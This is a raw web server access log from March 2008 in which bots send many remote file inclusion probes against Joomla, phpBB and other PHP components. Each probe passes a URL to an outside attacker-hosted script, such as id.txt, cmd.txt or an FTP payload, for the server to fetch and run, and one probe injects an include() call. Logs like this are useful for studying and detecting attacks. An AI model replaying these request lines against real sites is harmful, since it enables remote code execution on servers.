66.225.214.179 - - [25/Mar/2008:06:33:26 -0700] "GET //?mosConfig_absolute_path=http://www.elka.pw.edu.pl/ktmlpro/includes/ktedit/mic22?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.225.214.179 - - [25/Mar/2008:06:33:26 -0700] "GET /logs//?mosConfig_absolute_path=http://www.elka.pw.edu.pl/ktmlpro/includes/ktedit/mic22?? HTTP/1.1" 200 40268 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:33:30 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:33:30 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [25/Mar/2008:06:33:52 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.67.223.188 - - [25/Mar/2008:06:33:52 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
190.1.0.16 - - [25/Mar/2008:06:34:11 -0700] "GET ///tags.php?BBCodeFile=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:06:34:18 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:25 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:25 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:25 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:26 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:06:34:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [25/Mar/2008:06:34:47 -0700] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [25/Mar/2008:06:34:48 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [25/Mar/2008:06:34:48 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:06:34:49 -0700] "GET //index.php?option=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:06:34:57 -0700] "GET /logs/access_080118.log//index.php?option=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:06:34:57 -0700] "GET /logs//index.php?option=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:35:02 -0700] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [25/Mar/2008:06:35:16 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
209.67.223.188 - - [25/Mar/2008:06:35:16 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.246.98.186 - - [25/Mar/2008:06:35:20 -0700] "GET //?mosConfig_absolute_path=http://escape.dynamicdesign.at//components/com_zoom/classes/iptc/tetas.jpg?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.246.98.186 - - [25/Mar/2008:06:35:20 -0700] "GET /logs//?mosConfig_absolute_path=http://escape.dynamicdesign.at//components/com_zoom/classes/iptc/tetas.jpg?? HTTP/1.1" 200 40268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:35:41 -0700] "GET /logs/access_080117.log/index1.php?pg=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:35:58 -0700] "GET /logs/access_080211.log/test.php?page=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:35:58 -0700] "GET /logs/test.php?page=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:06:36:24 -0700] "GET /logs/access_080117.log/index1.php?pg=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:06:36:24 -0700] "GET /index1.php?pg=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:06:36:25 -0700] "GET /logs/index1.php?pg=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.223.188 - - [25/Mar/2008:06:37:10 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.67.223.188 - - [25/Mar/2008:06:37:10 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:37:26 -0700] "GET /logs/access_080117.log/test.php?page=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:37:46 -0700] "GET /logs/access_080101.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:06:38:01 -0700] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:06:38:01 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:06:38:02 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:06:38:55 -0700] "GET //index.php?option=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:06:39:09 -0700] "GET /logs/access_080118.log//index.php?option=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:06:39:09 -0700] "GET /logs//index.php?option=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:06:40:05 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.154 - - [25/Mar/2008:06:40:21 -0700] "GET /logs/access_070911.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:06:40:37 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:06:40:37 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:06:40:38 -0700] "GET /index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:06:40:46 -0700] "GET /logs/access_080119.log//?page=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.1.0.16 - - [25/Mar/2008:06:41:08 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:41:11 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:41:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:06:41:59 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:06:42:13 -0700] "GET /logs/access.log/archive/archive.php?adminfolder=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:06:42:14 -0700] "GET /archive/archive.php?adminfolder=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:06:42:14 -0700] "GET /logs/archive/archive.php?adminfolder=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:06:42:14 -0700] "GET /logs/access_080312.log/archive/archive.php?adminfolder=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.1.0.16 - - [25/Mar/2008:06:42:37 -0700] "GET /logs/access_080215.log///tags.php?BBCodeFile=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.1.0.16 - - [25/Mar/2008:06:42:37 -0700] "GET /logs///tags.php?BBCodeFile=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.1.0.16 - - [25/Mar/2008:06:42:43 -0700] "GET /logs/access_080306.log///tags.php?BBCodeFile=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:43:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:43:25 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:43:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:06:43:51 -0700] "GET /index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.192.123 - - [25/Mar/2008:06:43:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.7.192.123 - - [25/Mar/2008:06:43:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:06:44:05 -0700] "GET /logs/access_080131.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:06:44:06 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.16.254 - - [25/Mar/2008:06:44:54 -0700] "GET /tmp/sess_7ce90436de3fb5ffa8e3afddeb23e601 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:45:11 -0700] "GET /logs/access_080313.log//spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:45:15 -0700] "GET /logs/access_080313.log//spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:45:39 -0700] "GET /logs/access_080313.log//spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:06:45:55 -0700] "GET /index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:46:30 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:46:37 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:46:37 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:46:38 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.234 - - [25/Mar/2008:06:46:39 -0700] "GET /bikes/GPS/WeSTOC2008/?S=A HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.15.10 - - [25/Mar/2008:06:47:03 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:47:06 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:47:10 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:47:10 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:47:11 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.244.77 - - [25/Mar/2008:06:47:12 -0700] "GET /logs/access_080131.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:47:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:47:22 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:47:36 -0700] "GET /logs/access.log//common/db.php?commonpath=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:47:36 -0700] "GET //common/db.php?commonpath=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:47:36 -0700] "GET /logs//common/db.php?commonpath=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:47:39 -0700] "GET /logs/access.log//common/db.php?commonpath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:47:39 -0700] "GET //common/db.php?commonpath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:47:39 -0700] "GET /logs//common/db.php?commonpath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:48:15 -0700] "GET /logs/access.log//common/db.php?commonpath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:48:15 -0700] "GET //common/db.php?commonpath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:48:16 -0700] "GET /logs//common/db.php?commonpath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:48:33 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:48:33 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:48:33 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:06:48:34 -0700] "GET /logs/access_080119.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:49:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:49:22 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:06:49:39 -0700] "GET /logs/access_080224.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:06:49:40 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:06:49:40 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
